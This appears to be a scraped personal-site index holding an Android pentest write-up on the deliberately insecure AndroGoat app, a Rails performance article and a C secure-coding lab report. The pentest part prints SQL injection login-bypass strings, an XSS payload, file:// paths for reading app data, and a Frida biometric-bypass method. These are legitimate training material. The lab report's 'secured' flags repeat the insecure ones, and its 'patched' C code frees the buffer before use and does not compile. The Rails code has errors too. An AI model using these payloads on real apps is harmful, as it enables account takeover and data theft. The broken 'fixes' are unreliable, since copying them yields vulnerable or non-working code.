Standard SQLite databases are not encrypted. If an attacker gains access to the device (physically or via malware with root access), they can copy the .db file and read all contents.\nThe same problem appears again in the SQLite database under /data/data/owasp.sat.agoat/databases. SQLite gives you structure, not security. By default there is no encryption on the .db file, so once I have a copy of that file I can open it in DB Browser for SQLite and read all user records in clear text.\nIn this app, I was able to export the database directory and see all stored usernames and passwords immediately, without any brute‑forcing or reversing.\nTemp File # The application is also writing temporary files under /data/data/owasp.sat.agoat. Temp files are often forgotten by developers, but from an attacker’s point of view they are just another place to look for credentials or session data. If these files are not securely deleted, they can survive longer than intended and become an easy loot bag on a rooted device.\nExtrenal Storage / SDCARD # Since we have defined the READ_EXTERNAL_STORAGE in the manifest, we can read from external storage. Upon checking the sdcard location of our app, I do see the tmp file with the credentials: /sdcard/Android/data/owasp.sat.agoat/files. Finally, the app leaks credentials into external storage under this path.\nExternal storage is shared space: any other app with READ_EXTERNAL_STORAGE (or broad storage access on older Android versions) can read these files. So at this point, a low‑privileged malicious app installed on the same device can read the tmp file with credentials, without needing root at all.\nRecommendations # For a real app, the safer pattern is:\nAvoid storing raw passwords or long‑lived secrets on disk at all. Store only what you absolutely need (for example short‑lived access tokens instead of credentials). If you need to persist sensitive data, use Android’s EncryptedSharedPreferences or a similar wrapper instead of plain XML, and use an encrypted database solution (or store only hashed values with a strong KDF and salt) rather than a clear‑text SQLite file. Do not write credentials to temporary files. If a temp file is unavoidable, keep it in internal cache and delete it immediately after use. Never write secrets to external storage / SD card. Treat external storage as untrusted and world‑readable. If you must store something there, encrypt it first with a key held in the Android Keystore and never store the key next to the data. 5. Input Validations # The \u0026ldquo;Golden Rule\u0026rdquo; of OWASP is that client-side validation is for user experience, but server-side validation is for security. AndroGoat deliberately breaks this rule in a few places: SQL queries are built by string concatenation, HTML is rendered without sanitisation, and WebView is allowed to load almost anything the user types. This makes it very easy to turn normal user input into executable code on the device.\n1. SQL Injection # Happens because the app takes user input and processes that as code by directly concatenating it into a SQLite database query. Content Providers are most prone to SQL Injection since this data is shared with all the apps e.g contacts. Successful compromise of the SQLite dbs leads to corruption, deletion or exfiltration of data.\nBypassed by: ' OR '1'='1 OR ' OR 1=1 -- and the vulnerable piece of code is here: String qry = \u0026quot;SELECT * FROM users WHERE username='\u0026quot; + ((Object) $username.getText()) + \u0026quot;'\u0026quot;; because we are appending unsanitised user input to the SQL query by string concatenation\nIn practice this means I can log in as any user I want, or dump large parts of the users table, without knowing a valid password.\nSolution: # Use prepared statements / parameterised queries when passing user input into SQLite so that the input is always treated as data and not as part of the SQL syntax.\n2. XSS # XSS allows an attacker to execute arbitrary JavaScript code in the context of the WebView. Successful exploitation of this vulnerability may allow a remote attacker to steal potentially sensitive information, change appearance of a web page, perform phishing and drive-by-download attacks.\nSource of the vulnerability: webSettings.setJavaScriptEnabled(true);. By default, Android WebView does not execute JavaScript. Explicitly setting this to true allows the script tags inside the HTML content to run.\nCompromise using the Javascript input: \u0026lt;img src=x onerror=alert(\u0026lsquo;XSS\u0026rsquo;)\u0026gt; 3. Webview # Can be caused by Unvalidated, Unrestricted WebView URL Loading using:\nwebViewSettings.setJavaScriptEnabled(true); //1 webViewSettings.setAllowFileAccess(true); //2 webViewSettings.setAllowContentAccess(true); webViewSettings.setAllowFileAccessFromFileURLs(true); //3 setAllowUniversalAccessFromFileURLs(true); String url = $urlEditText.getText().toString(); $webView.loadUrl(url); //4 } The code above allows for an attacker to do the following:\nThis allows for Cross-Site Scripting (XSS) if the user loads a malicious page. Local File Inclusion: Allows the WebView to access the Android file system using the file:// scheme. e.g file:///data/data/owasp.sat.agoat/shared_prefs/ E.G Dump shared preferences: Allows JavaScript running in a file scheme context (e.g., file:///sdcard/exploit.html) webViewSettings. E.G.\nDisables the Same-Origin Policy (SOP) for file schemes. It allows a script running in a local file to make requests to any origin (including the internet or other local files) and read the response. The app is loading the user input directly into the WebView without any validations, with universal file access enabled.\nRecommendations # Validate and sanitise all user input on the server side, and never build SQL queries by string concatenation. Always use parameterised queries or prepared statements. For XSS, avoid rendering untrusted HTML directly. If a WebView is required, keep setJavaScriptEnabled(false) unless there is a strong reason, and sanitise any HTML you do render. Lock down WebView usage: restrict loadUrl to a small whitelist of trusted domains, disable setAllowFileAccessFromFileURLs and setAllowUniversalAccessFromFileURLs unless absolutely necessary, and do not allow user-controlled file:// URLs. 6.Side Channel Data Leakage # This is how sensitive information can be leaked through the Android operating system\u0026rsquo;s features, rather than through a direct flaw in the app\u0026rsquo;s code or network. In other words, nothing is “hacked” in the classic sense; the app is simply not marking sensitive fields correctly or is writing secrets to places where the OS can see and reuse them.\nWhen you type information into standard EditText fields on Android, the operating system\u0026rsquo;s keyboard (like Gboard or Samsung Keyboard) attempts to \u0026ldquo;learn\u0026rdquo; your typing habits to offer autocorrect suggestions and predictions. To do this, it stores the words you type in a local dictionary or cache.\nIf an application does not explicitly tell the OS, \u0026ldquo;This field contains sensitive data by using the password field, the keyboard will cache sensitive data. An attacker who gains physical access to the device or a malicious app with access to the user dictionary can extract this data.\n1. Keyboard Cache # Android keyboards (Input Method Editors or IMEs) utilize a user dictionary to provide auto-correction and predictive text. By default, any text typed into a standard EditText field is added to this dictionary. In AndroGoat, the password is defined using EditText therefore if i start typing my password, the cached value I had entered is shown in the suggestions:\n2. Insecure Logging # The app writes the raw password to Logcat which violates GDPR rules.\n3. Clipboard Vuln # OTP code is coppied to clipboard. In Android, clipboard data is made available to all the apps that have the READ_CLIPBOARD permission.\nThe attack A malicious app can constantly monitor the clipboard. As soon as your app generates the OTP and puts it on the clipboard, the malicious app grabs it and exfiltrates this data to a remote server for example. This allows attackers to bypass 2FA.\nRecommendations # For keyboard cache, mark sensitive fields correctly (e.g. use android:inputType=\u0026quot;textPassword\u0026quot; and android:importantForAutofill=\u0026quot;no\u0026quot; / noExcludeDescendants) so that the OS does not learn or suggest secrets. Never log secrets. Avoid writing passwords, OTPs or tokens to Logcat; if you need logging, log high‑level events only (e.g. \u0026ldquo;login failed\u0026rdquo;) and strip sensitive values. Avoid putting OTPs or passwords on the clipboard. Where possible, auto‑fill the value inside the app instead of copying it, or at least clear the clipboard immediately after use and warn users that clipboard data can be read by other apps. 7. BIOMETRIC AUTHENTICATION # Biometric authentication includes the fingerprint reader and the camera for facial recognition. In Android, biometrics can be used in two very different ways: either just as a convenience \u0026ldquo;unlock\u0026rdquo; (a boolean callback that says success/fail), or as a way to unlock a real cryptographic key from the Android Keystore.\nThe flaw: In this app, biometrics are only used in the first, weak way. The code just listens for the onAuthenticationSucceeded callback and, if it fires, treats the user as fully authenticated. No cryptographic key is unlocked, no token is signed, and nothing is bound to the hardware. The app is basically saying: \u0026ldquo;If Android tells me success, I will trust it blindly.\u0026rdquo;\nThe exploit: Because there is no cryptographic proof, I can use Frida to fake that callback. Instead of presenting a real finger, I hook the biometric flow and manually trigger success:\nI attach Frida to the process and hook BiometricPrompt.authenticate() / the callback path. When the app requests a fingerprint and waits for onAuthenticationSucceeded, my script intercepts the call and immediately invokes the success path. From the app\u0026rsquo;s point of view, it looks exactly like a genuine fingerprint match, but no real biometric was used and the user never touched the sensor.\n","date":"3 February 2026","permalink":"/njeri/posts/androgoat/","section":"Posts","summary":"Android Pentesting # To sharpen my skills, I recently took a deep dive into AndroGoat—a deliberately insecure Android application designed to showcase the most common OWASP Mobile Top 10 vulnerabilities.\nIn this post, I’ll walk through how I combined both static and dynamic analysis to uncover hardcoded secrets, bypass security checks with Frida, and extract sensitive data from local storage.\nMy pentesting toolkit:\nMy pentesting tookit included:\nJadx-GUI: For decompiling and reading Java/Kotlin source code.\nThe Android Debug Bridge (adb)**: The \u0026ldquo;command line\u0026rdquo; for interacting with the emulator on android studio.\nFrida: For dynamic instrumentation. Instrumentation is the art of imjecting new functionality to the application at runtime e.","title":"Android Pentesting with AndroGoat"},{"content":"","date":"3 February 2026","permalink":"/njeri/categories/","section":"Categories","summary":"","title":"Categories"},{"content":"","date":"3 February 2026","permalink":"/njeri/tags/database/","section":"Tags","summary":"","title":"database"},{"content":"","date":"3 February 2026","permalink":"/njeri/tags/database-security/","section":"Tags","summary":"","title":"database security"},{"content":"","date":"3 February 2026","permalink":"/njeri/tags/mobile/","section":"Tags","summary":"","title":"mobile"},{"content":"","date":"3 February 2026","permalink":"/njeri/tags/mobile-pentest/","section":"Tags","summary":"","title":"mobile pentest"},{"content":"","date":"3 February 2026","permalink":"/njeri/tags/pentest/","section":"Tags","summary":"","title":"pentest"},{"content":"","date":"3 February 2026","permalink":"/njeri/tags/security/","section":"Tags","summary":"","title":"security"},{"content":"","date":"3 February 2026","permalink":"/njeri/categories/security/","section":"Categories","summary":"","title":"security"},{"content":"Learning Transformers (Next 4 weeks)\nWorking through the ARENA Transformer Interpretability course to deepen my understanding of transformer architectures and mechanistic interpretability.\nPenetration Testing\nCurrently pentesting vulnerable mobile applications to strengthen my security assessment skills.\n","date":"19 December 2025","permalink":"/njeri/now/","section":"","summary":"Learning Transformers (Next 4 weeks)\nWorking through the ARENA Transformer Interpretability course to deepen my understanding of transformer architectures and mechanistic interpretability.\nPenetration Testing\nCurrently pentesting vulnerable mobile applications to strengthen my security assessment skills.","title":"Now"},{"content":"Users desire apps that run smoothly, load fast, and don\u0026rsquo;t crash. But what determines an app\u0026rsquo;s performance? There are two key factors: performance and memory usage. Performance refers to how fast your app loads for users. Memory footprint is the amount of system memory your app uses. If your app is slow or hogs too much memory, users won\u0026rsquo;t stick around. That\u0026rsquo;s where optimizing your Ruby on Rails app becomes essential.\nIn this article, we\u0026rsquo;ll explore techniques that enhance performance and reduce memory usage, ensuring user satisfaction and the success of your app.\nUnderstanding performance and memory footprint # The performance of an app refers to how fast your app loads for the end-users. As a developer, app performance should always be a priority even as you are adding new features and architecting your app.\nMemory footprint refers to how much system memory or RAM space your app uses while it\u0026rsquo;s running. Most computers have a finite amount of memory therefore, excessive memory usage can lead to freezing or crashes, degrading the user experience. Developers must find ways to minimize their app\u0026rsquo;s memory footprint.\nGoals of optimization # The main goals of optimizing memory use and app performance are:\nUser satisfaction. Your goal as a developer is to get as many users as possible to use your app and to ensure that they enjoy interacting with the app. Business Scalability. Optimized performance and reduced memory usage enable your business to scale, attracting more customers and generating revenue. It validates your efforts as a developer and ensures wider adoption of your technology and keeps the investors happy. But how do you optimize your Rails app? In the next section, you\u0026rsquo;ll learn about various techniques you can use to optimize the performance and memory usage of your app:\nTechniques for optimization # Lazy loading # Lazy loading involves loading webpage components on demand, as the user needs them, rather than downloading the entire webpage at once. This prevents noticeable lagging while webpage content gets downloaded. For example, a blogging app could be architectured to dynamically load posts as the user scrolls, preventing memory overload. For instance:\n# articles_controller.rb class ArticlesController \u0026lt; ApplicationController def index @articles = Article.limit(10) # Load only 10 articles initially end # Load more articles when the user clicks on the load more button def load_more_articles @articles = Article.limit(10).offset(params[:offset]) render partial: \u0026#39;articles/article\u0026#39;, collection: @articles end end In Rails, you should write your code so that data is queried from your database as required. The fewer the SQL queries made to the database at a single time, the better the app\u0026rsquo;s performance. Alternatively, you can perform all the heavy database queries in the background so not to freeze the UI.\nLazy loading leads to quicker initial load time and doesn\u0026rsquo;t hog server/client resources every time they access an app.\nOptimize your database queries # Writing inefficient database queries slows down apps and leads to excessive memory consumption, both of which will plummet the app\u0026rsquo;s performance. In Rails, N+1 queries are a major performance problem. They occur when you query the database multiple times for related records, resulting in slower response times. For example, in your blog app, you may have two models: Article and Comment. N+1 will occur when you write two queries; one to fetch a list of all articles and another to fetch all the comments associated with each article.\n// Fetch all the articles articles = Article.all // Loop through all the articles and find the number of comments articles.each do |article| count = article.comment.count end To optimize N+1 queries:\nUse the Bullet gem to help detect the N+1 queries in your apps. Use Active Record\u0026rsquo;s eager loading to write memory-efficient database queries. Active Record has an eager_load function that gets all the associated data using a left outer join to combine the requests into a single query. To make the code snippet above performant, you should use articles = Article.includes(:comments) to fetch articles and associated comments in a single query. Use indexes to reduce how much data your queries need to read and process from the database. Indexed queries reduces query response time and make it easy to scale an app without affecting its performance. Use Active Record to cache recent queries. Therefore instead of feching data from the database for all subsequent similar requests, it\u0026rsquo;s best to fetch the data from the Active record cache. Optimizing database queries is crucial for app performance. By using Active Record\u0026rsquo;s eager loading, indexing smartly, and leveraging cache, you can significantly boost your app\u0026rsquo;s speed and efficiency.\nUse memory profiling tools # Memory profiling tools are tools that are used to monitor and identify memory leaks in an app that could lead to app lagging or crashing. Ruby uses a Garbage Collector to automatically allocate and deallocate memory from objects which optimizes memory. However, sometimes the Garbage Collector fails to deallocate memory from objects that are no longer being used leading to memory leaks. You therefore need to use a memory profiler tool or memory profiler gems such as ruby-prof to identify which objects are in use and how much memory is allocated to each.\nFor instance, you can use the built-in Ruby profiler by running ruby -rprile script.rb which tells Ruby to require the profile library and then run the script.rb file. Once the script is executed successfully or you kill the ruby process, the profile library will print out a performance profile on your terminal. You can then use a profiling tool to identify methods and parts of code that cause the highest memory usage and fix these memory issues.\nCaching # Caching is the practice of storing the response data returned from the server when a request is made and reusing the data for similar requests. The more requests you make to the server, the slower the app gets, especially as the app grows and the data being fetched increases. Caching is the most effective way of improving your app\u0026rsquo;s performance.\nThe following are some caching techniques you can use in your Rails apps:\nMemory caching. Ruby has built-in caching which lets you cache your fragments, pages, and actions to reuse when responding to requests. Rails provides fragment caching by default, and to add page and action caching, you\u0026rsquo;ll need to add actionpack-page_caching and actionpack-action_caching gems to your Gemfile. Rails with fetch the views, pages or actions from the cache store as opposed to makiing a request to the server, reducing app latency significantly and improving performance and scalability.\nMemoizing expensive computations.Memoization is a technique used in Ruby to speed up accessor methods by changing the results of methods. For example:\ndef current_user @current_user ||= User.find(user_id) end Using the ||= memoization pattern, you cache the database query result of the @current_user after the first time the method is invoked. All the subsequent calls reuse the value stored in the @current_user instance variable. The ||= means that if the @current user instance variable isn\u0026rsquo;t empty or null, don\u0026rsquo;t evaluate the right-hand side of the expression and return its value, else evaluate the expression on the right. This improves performance by caching expensive method calls.\nRemove unused Gems # Each Rails gem consumes some memory during startup causing memory bloat and slowing down your app You should occasionally check how much memory gems use using the derailed benchmarks gem. Add gem 'derailed_benchmarks', group: :development to your Gemfile, then run bundle exec derailed bundle:mem and from the output identify gems consuming excessive memory and consider replacing them with lightweight alternatives. From the screenshot above, you can see that papertrail consumes the most memory on startup out of all the gems, you then look for alternatives to replace the gem with a lightweight gem.\nUse CDN to reduce latency # A Content Delivery Network(CDN) refers to a geographically distributed group of servers that caches app data closer to the users. CDNs solve the latency (time between when an app makes a request for data and when the data from the server is rendered to the end-user) problem through the following ways:\nThey reduce app load time by reducing the distance between the end users by letting the users connect to the closest server geographically to them. CDNs also offer the load balancing feature that evenly distributes the oncoming app traffic amongst multiple backend servers which prevents one server from being overloaded with requests hence improving app performance. Conclusion # Optimizing your Ruby on Rails app is crucial for keeping users engaged and your business growing. By implementing techniques like lazy loading, optimizing database queries, using memory profiling tools, caching data, removing unused gems, and leveraging CDNs, you can ensure your app runs smoothly and efficiently. Don\u0026rsquo;t forget to monitor and fine-tune your app regularly to maintain peak performance. Start optimizing today to provide the best experience for your users and unlock your app\u0026rsquo;s full potential.\n","date":"24 January 2025","permalink":"/njeri/posts/rails-memoryfootprint/","section":"Posts","summary":"Users desire apps that run smoothly, load fast, and don\u0026rsquo;t crash. But what determines an app\u0026rsquo;s performance? There are two key factors: performance and memory usage. Performance refers to how fast your app loads for users. Memory footprint is the amount of system memory your app uses. If your app is slow or hogs too much memory, users won\u0026rsquo;t stick around. That\u0026rsquo;s where optimizing your Ruby on Rails app becomes essential.\nIn this article, we\u0026rsquo;ll explore techniques that enhance performance and reduce memory usage, ensuring user satisfaction and the success of your app.\nUnderstanding performance and memory footprint # The performance of an app refers to how fast your app loads for the end-users.","title":"Optimizing your Ruby on Rails app for improved performance and reduced memory footprint"},{"content":"","date":"24 January 2025","permalink":"/njeri/tags/ruby-on-rails/","section":"Tags","summary":"","title":"Ruby on Rails"},{"content":"The objective of this lab is to build on our understanding of secure programming in C by analyzing, enhancing, and securing the functionality of the program from Project Lab 1, with a focus on identifying and mitigating vulnerabilities and improving resilience against attacks like fuzzing.\nThis lab focuses on identifying vulnerabilities in the source code, applying and validating patches, and proposing future best practices to prevent similar issues. Additionally, we will analyze the code using security analysis tools (cppcheck) to find out about the vulnerabilities in code. After compiling the project, we will inspect the resulting binary in Ghidra to identify similarities and differences, which will further inform our understanding of the program\u0026rsquo;s security and allow us to apply effective mitigations. The goal is to deliver a secure, improved program with a detailed report on the analysis, changes, and recommendations.\nLink to the Lab resouces on Github # Lab 2 and Lab 3\nAnalysis Method (cppcheck) # Since we are provided with a source code, we try to identify potential threats in the code with a static code analysis tool- cppcheck.\nFirst, we extract the provided files using the given instructions. We run cppcheck on the program and we identified the following threats: Variable Scope Issues: The variables in0 and in1 in src/main.c have unnecessarily wide scopes, which may lead to unintended use or harder code maintenance. Unsafe Use of scanf(): In src/validation/validation_functions.c, scanf(\u0026quot;%s\u0026quot;, buffer) lacks a field width limit, making it vulnerable to buffer overflows if provided with excessively large input. Unused Function: The function fnR in src/action/action_functions.c is never called, indicating potential dead code, which can increase codebase complexity or lead to latent issues if not properly reviewed. Given the program\u0026rsquo;s small size, we can conduct manual security code reviews against secure coding standards and write test programs to identify common vulnerabilities. However, since we use a Makefile to efficiently compile and run multiple files together, manually reviewing each file one by one becomes impractical in real-world scenarios. Therefore, we propose starting with static analysis for a more efficient and thorough approach. Legacy Options # Finding the Original Compiler Options (LEGCFLAGS) Leading to Vulnerabilities # checksec is a Linux tool that analyzes binary files to identify security features implemented during compilation and linking, such as RELRO, NX, PIE, Stack Canary, and FORTIFY_SOURCE. To infer the LEGCFLAGS (Linux Exploit GDB Compiler Flags) used in the door-locker binary from the given checksec output, we analyze the provided information step by step: Breakdown of checksec Output: # RELRO: Partial RELRO Indicates that the binary is compiled with Wl,-z,relro but not with Wl,-z,now. This provides partial protection against GOT overwrite attacks. At first we only configured with -z,relro -Wl, however it would always still be fully enabled, thus we suspected that this configuration is applied by default, thus we have to take an extra step to disable it with -Wl,-z,lazy to enforce lazy symbol resolution, which is required for Partial RELRO. STACK CANARY: No canary found Suggests the binary was not compiled with fstack-protector or similar flags. This makes it vulnerable to stack-based buffer overflows. NX (No Execute): Enabled The binary is compiled with Wl,-z,noexecstack or equivalent, which prevents code execution on the stack. PIE (Position-Independent Executable): Enabled Indicates the binary was compiled with fPIE -pie. This allows address randomization, enhancing security against exploits. RPATH and RUNPATH: Not set The binary has no hardcoded runtime library search paths, indicating good practice. Symbols: (45) Symbols Indicates the binary includes some debug symbols or symbol table information, possibly due to compilation with g or no stripping of symbols. FORTIFY: No The binary lacks fortification, thus we configured it explicitly as D_FORTIFY_SOURCE=0. Likely Legacy Options: # Based on the above, the likely compiler flags are:\nLEGCFLAGS =-fpie -D_FORTIFY_SOURCE=0 -fno-stack-protector LEGLDFLAGS =-pie -Wl,-z,relro -Wl,-z,lazy -Wl,-z,noexecstack Checksecafter making the program and got the identical security configuration result as the binary file provided in Lab 1. These flags explain the security features observed:\nfPIE -pie: For PIE enabled. These flags enable Position-Independent Executable (PIE), making the executable\u0026rsquo;s code location-independent, which allows the OS to load it at different memory addresses for better security (such as enabling Address Space Layout Randomization, ASLR). D_FORTIFY_SOURCE=0: For No Fortify. This disables the FORTIFY_SOURCE security feature, which normally enhances the security of certain string and memory operations by checking for buffer overflows at compile time. fno-stack-protector: For No Canary Found. This flag disables stack protection mechanisms (canary values) that are used to detect and prevent stack buffer overflows during execution. Wl,-z,relro \u0026amp; -Wl,-z,lazy : For Partial RELRO. The -z,relro flag enables a form of read-only relocation (RELRO) to protect the Global Offset Table (GOT) from modification, while -z,lazy ensures that symbol resolution is deferred until needed, allowing for Partial RELRO. Wl,-z,noexecstack: For NX enabled. This flag prevents the stack from being executable, mitigating the risk of certain types of attacks, such as buffer overflows that attempt to execute code from the stack (NX or No Execute protection). Analyze Binary in Ghidra # Compilation options used for LEGCFLAGS =-fpie -D_FORTIFY_SOURCE=0 -fno-stack-protector LEGLDFLAGS =-pie -Wl,-z,relro -Wl,-z,lazy -Wl,-z,noexecstack Original Binary for main function (Lab 1) int main(int argc,char **argv) { long lVar1; long lVar2; int iVar3; if (argc == 3) { iVar3 = validate(argv); if (iVar3 == 0) { puts(\u0026#34;\\nChecking values\u0026#34;); lVar1 = strtol(argv[2],(char **)0x0,10); lVar2 = strtol(argv[1],(char **)0x0,10); iVar3 = 0; if (lVar2 == lVar1) { puts(\u0026#34;Valid access.\u0026#34;); fngrt(); } else { fnr(); } } else { fnr(); iVar3 = 0; } } else { puts(\u0026#34;Usage : client \u0026lt;chiffre0\u0026gt; \u0026lt;chiffre1\u0026gt;\u0026#34;); iVar3 = 1; } return iVar3; } New Binary for main function (Lab 2) int main(int argc,char **argv) { int iVar1; int iVar2; long lVar3; long lVar4; if (argc == 3) { iVar1 = validate(argv); if (iVar1 == 0) { puts(\u0026#34;\\nChecking values\u0026#34;); lVar3 = strtol(argv[2],(char **)0x0,10); lVar4 = strtol(argv[1],(char **)0x0,10); iVar2 = fnchck((int)lVar4,(int)lVar3); iVar1 = 0; if (iVar2 == 0xf) { fngrt(); } else { fnr(); } } else { fnr(); iVar1 = 0; } } else { puts(\u0026#34;Usage : client \u0026lt;chiffre0\u0026gt; \u0026lt;chiffre1\u0026gt;\u0026#34;); iVar1 = 1; } return iVar1; } Overview # Two binary files, produced from slightly differing versions of source code, were analyzed. Despite identical checksec results indicating similar security configurations, functional discrepancies were observed. This report outlines the differences, potential causes, and investigative steps taken to identify the reasons behind the variations.\nKey Observations # Logic Differences in Validation:\nFirst Binary: Directly compares two long values using if (lVar2 == lVar1) to determine success. fnchck is included in the project but never called. Second Binary: Introduces a new function, fnchck, which takes the casted integer values of lVar3 and lVar4 as arguments. Success is determined by the condition if (fnchck(...) == 0xf). Finding: The second binary includes an additional layer of logic not present in the first.\nVariable Usage and Type Casting:\nBoth binaries use long variables for storing input values. The second binary explicitly casts these long values to int when calling fnchck. Finding: Type casting was introduced in the second binary, potentially as part of an additional validation mechanism.\nCommon Functionality:\nBoth binaries call fngrt() upon success and fnr() upon failure. However, the success criteria differ due to the logic variations described above. Finding: Core functionality remains similar, but validation mechanisms differ.\nPotential Causes of Differences # Source Code Variations: The inclusion of fnchck in the second binary suggests either a different version of the source code or manual modification. Conditional Compilation: Preprocessor directives such as #ifdef or #define may have enabled or disabled specific sections of code during compilation. Compiler or Optimization Settings: Compiler flags (e.g., O2, O3) may have introduced optimizations or modifications in one binary but not the other. However, optimizations typically simplify logic rather than adding new functions like fnchck. Linker Behavior or Library Dependencies: Differences in the linker scripts, library versions, or included dependencies might have affected the compiled output. Possible Next Investigative Steps # Compilation Flags: The compilation process for both binaries was analyzed with verbose options (gcc -v and ld --verbose) to identify differences in flags. Special attention was paid to optimization levels and security-related flags. Disassembly Analysis: Using objdump -d, the assembly-level differences between the two binaries were reviewed. This revealed the introduction of fnchck and its associated logic in the second binary. Preprocessor Directives: The source code was inspected for conditional compilation directives (e.g., #ifdef) that could enable or disable sections of the code. Controlled Recompilation: Various combinations of compiler and linker flags were tested to replicate the logic in both binaries, including: Adjusting optimization levels (O0, O2, O3). Explicitly enabling or disabling RELRO (Wl,-z,relro or Wl,-z,now). Original Binary for validate function (Lab 1)\nvoid validate(int param_1) { char local_20 [24]; printf(\u0026#34;You entered %s and %s. \\nDo you agree ? (Y,n):\\n\u0026#34;,*(undefined4 *)(param_1 + 4), *(undefined4 *)(param_1 + 8)); __isoc99_scanf(\u0026amp;DAT_00012057,local_20); strcmp(local_20,\u0026#34;Y\u0026#34;); return; } New Binary for validate function (Lab 2) int validate(char **argv) { uint uVar1; int iVar2; char buffer [20]; printf(\u0026#34;You entered %s and %s. \\nDo you agree ? (Y,n):\\n\u0026#34;,argv[1],argv[2]); __isoc99_scanf(\u0026amp;DAT_0010204b,buffer); uVar1 = strcmp(buffer,\u0026#34;Y\u0026#34;); if (uVar1 != 0) { iVar2 = strcmp(buffer,\u0026#34;y\u0026#34;); uVar1 = (uint)(iVar2 != 0); } return uVar1; } The primary differences seems to be due to code-level changes rather than compiler flags differences. However, certain flags like -fstack-protector, -O2, or -O3 could potentially influence buffer allocation, optimization, or even removal of unused code, but they are not directly responsible for the changes in logic and structure between the two versions. The second version appears to be a more robust implementation, checking both uppercase and lowercase \u0026quot;Y\u0026quot; inputs and correctly using the result of the comparison.\nSecured Makefile Configuration # 1. LEGCFLAGS = -fpie -D_FORTIFY_SOURCE=0 -fno-stack-protector # fpie: This flag enables the creation of position-independent executables (PIE). This improves security by enabling Address Space Layout Randomization (ASLR), making it harder for attackers to predict the memory layout of a program. D_FORTIFY_SOURCE=0: This disables the \u0026ldquo;fortify\u0026rdquo; source feature, which provides additional compile-time checks to enhance security. By setting this to 0, the program won\u0026rsquo;t benefit from additional security features such as bounds checking for certain functions like strcpy, memcpy, etc. Recommendation: Remove this flag or set it to 2 (the highest level of fortification). Setting it to 0 reduces the security checks and can make your application more vulnerable to buffer overflow attacks. fno-stack-protector: This disables stack protection, which is typically used to detect and prevent buffer overflow attacks by placing \u0026ldquo;canaries\u0026rdquo; on the stack. Recommendation: Remove this flag. Disabling stack protection weakens security by making it easier for attackers to exploit stack buffer overflows. Keep fstack-protector or use fstack-protector-strong (which is a more secure version). 2. LEGLDFLAGS = -pie -Wl,-z,relro -Wl,-z,lazy -Wl,-z,noexecstack # pie: This flag creates a position-independent executable, which works together with ASLR to randomize the memory layout, improving security. Wl,-z,relro: This flag enables \u0026ldquo;Read-Only Relocation\u0026rdquo; (RELRO), which makes it harder for an attacker to modify function pointers after the program starts. It improves security by making certain sections of memory read-only after the relocation phase. Wl,-z,lazy: This flag instructs the linker to delay symbol resolution until the symbol is actually used. This can make the program load more efficiently, but it could make it easier for an attacker to exploit any unresolved symbols before they are properly bound. Recommendation: Remove this flag. It introduces a potential risk because unresolved symbols could be hijacked before the program fully resolves them, weakening security. Wl,-z,noexecstack: This flag marks the stack as non-executable, which prevents code from being executed on the stack. This helps mitigate attacks like buffer overflows that try to execute shellcode on the stack. Recommendation: Keep this flag. It is an essential security feature that helps prevent stack-based code execution vulnerabilities. Security Enhancements Summary: # Remove D_FORTIFY_SOURCE=0: Reinstate compiler security checks for bounds checking and other safeguards by setting it to 2. Remove fno-stack-protector: Keep stack protection enabled to defend against stack overflow attacks. Remove Wl,-z,lazy: Avoid lazy symbol resolution to reduce potential vulnerabilities related to unresolved symbols. Keep Wl,-z,noexecstack and pie: These flags enhance security by preventing stack execution and enabling position-independent executables. The proposed secured configuration:\nLEGCFLAGS =-fpie -D_FORTIFY_SOURCE=0 -fno-stack-protector LEGLDFLAGS =-pie -Wl,-z,relro -Wl,-z,lazy -Wl,-z,noexecstack When trying to build the make file with a secured configuration, we discovered that there will be a warning that stop the code from building, thus we added a bypass to that specific warning: -Wno-unused-result . Since we were merely trying to see how the mitigation in compilation level carry out, we ignore this code level error. Successfully built the program after bypassing -Wno-unused-result error. Try to carry out the buffer over flow attack again but could see that the attack is detected and terminated. How It Enhances Security # Memory Safety: Prevents stack-based buffer overflows (fstack-protector-strong). Disallows execution of code on the stack (z noexecstack). Exploit Mitigation: ASLR support makes memory addresses unpredictable (fpie, pie). RELRO ensures critical relocation structures are immutable (Wl,-z,relro -Wl,-z,now). Improved Code Quality: Enforces secure coding standards and flags potential vulnerabilities during compilation (Wall -Wextra -Werror). Runtime Safety: Uses trusted library paths and avoids unsafe or unverified libraries. In order to prevent the buffer overflow and lack of user input validation vulnerabilities discovered, we patched thevalidation_functions.c source code as shown below\n#include \u0026lt;stdio.h\u0026gt; #include \u0026lt;string.h\u0026gt; #include \u0026#34;validation_functions.h\u0026#34; int fnchck(int a, int b) { int check; if (b == a) { puts(\u0026#34;Valid access.\u0026#34;); check = 0xf; } else { check = 0; } return check; } int validate(char * argv[]) { // Use malloc to dynamically allocate memory at runtime char *buffer = (char *)malloc(20); printf(\u0026#34;You entered %s and %s. \\nDo you agree ? (Y,n):\\n\u0026#34;, argv[1], argv[2]); // Use fgets to read the user input since it only writes upto the buffer size thus preventing buffer overflow fgets(buffer, 20, stdin) // Free the allocated memory free(buffer) // Return 0 if buffer == \u0026#34;Y\u0026#34; or buffer == \u0026#34;y\u0026#34; return (strcmp(buffer, \u0026#34;Y\u0026#34;) == 0) || (strcmp(buffer, \u0026#34;y\u0026#34;) == 0); } How to patch the vulnerabilities above # The source code below is the patched code of validation_functions.c\n#include \u0026lt;stdio.h\u0026gt; #include \u0026lt;string.h\u0026gt; #include \u0026#34;validation_functions.h\u0026#34; int fnchck(int a, int b) { int check; if (b == a) { puts(\u0026#34;Valid access.\u0026#34;); check = 0xf; } else { check = 0; } return check; } int validate(char * argv[]) { // Use malloc to dynamically allocate memory at runtime char *buffer = (char *)malloc(20); printf(\u0026#34;You entered %s and %s. \\nDo you agree ? (Y,n):\\n\u0026#34;, argv[1], argv[2]); // Use fgets to read the user input since it only writes upto the buffer size thus preventing buffer overflow fgets(buffer, 20, stdin) // Free the allocated memory free(buffer) // Return 0 if buffer == \u0026#34;Y\u0026#34; or buffer == \u0026#34;y\u0026#34; return (strcmp(buffer, \u0026#34;Y\u0026#34;) == 0) || (strcmp(buffer, \u0026#34;y\u0026#34;) == 0); } The code above does the following:\nchar *buffer = (char *)malloc(20); will dynamically assign memory to our buffer at run time. This allows memory to be allocated at random addresses when ASLR is active. fgets(buffer, 20, stdin). fgets is more secure compared to scanf. The fgets function ensures that no more than 19 characters are read, preventing buffer overflow when saving the input to buffer and leaving space for the null terminator. return (strcmp(buffer, \u0026quot;Y\u0026quot;) == 0) || (strcmp(buffer, \u0026quot;y\u0026quot;) == 0). The initial return function had two issues. First, it used the \u0026amp;\u0026amp; comparator, which meant that if the user inputs 